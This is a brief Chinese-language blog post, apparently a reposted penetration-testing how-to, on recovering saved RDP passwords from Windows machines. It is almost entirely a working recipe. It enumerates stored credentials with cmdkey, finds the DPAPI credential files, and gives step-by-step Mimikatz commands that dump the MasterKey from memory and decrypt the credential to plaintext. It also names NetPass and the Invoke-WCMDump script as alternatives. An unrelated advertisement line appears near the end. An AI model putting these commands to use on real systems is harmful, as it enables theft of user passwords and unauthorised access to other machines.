RDP登录凭据获取

RDP登录凭据获取

当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法

#查看mstsc的连接记录
cmdkey /list
#查找本地的Credentials
dir /a %userprofile%appdatalocalmicrosoftcredentials*

img

Mimikatz

存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:Usersadministrator.TESTappdatalocalmicrosoftcredentialsAFCD2DF5CFF3011965E57ABB0ED64240"

img

接着,再执行如下命令,找到guidMasterKey对应的MasterKey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

img

执行以下命令,使用上面记录的MasterKey解密指定的凭据: AFCD2DF5CFF3011965E57ABB0ED64240

mimikatz.exe "dpapi::cred /in:C:Usersadministrator.TESTappdatalocalmicrosoftcredentialsAFCD2DF5CFF3011965E57ABB0ED64240 /masterkey:3886e1d7a926c6267058d67385cb4e985b3aa0d3f635eebb5fe83ce8d0457d4493e8694f60d9f19a96631c89411ed5477254be5cd5d90c5ed5d36bd4c3271615"

img

如上图,已解密出明文。

NetPass抓取

工具下载地址:https://www.nirsoft.net/utils/network_password_recovery.html

img

PowerShelll脚本抓取

Import-Module .Invoke-WCMDump.ps1
Invoke-WCMDump

参考链接

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/tomyyyyy/p/15192801.html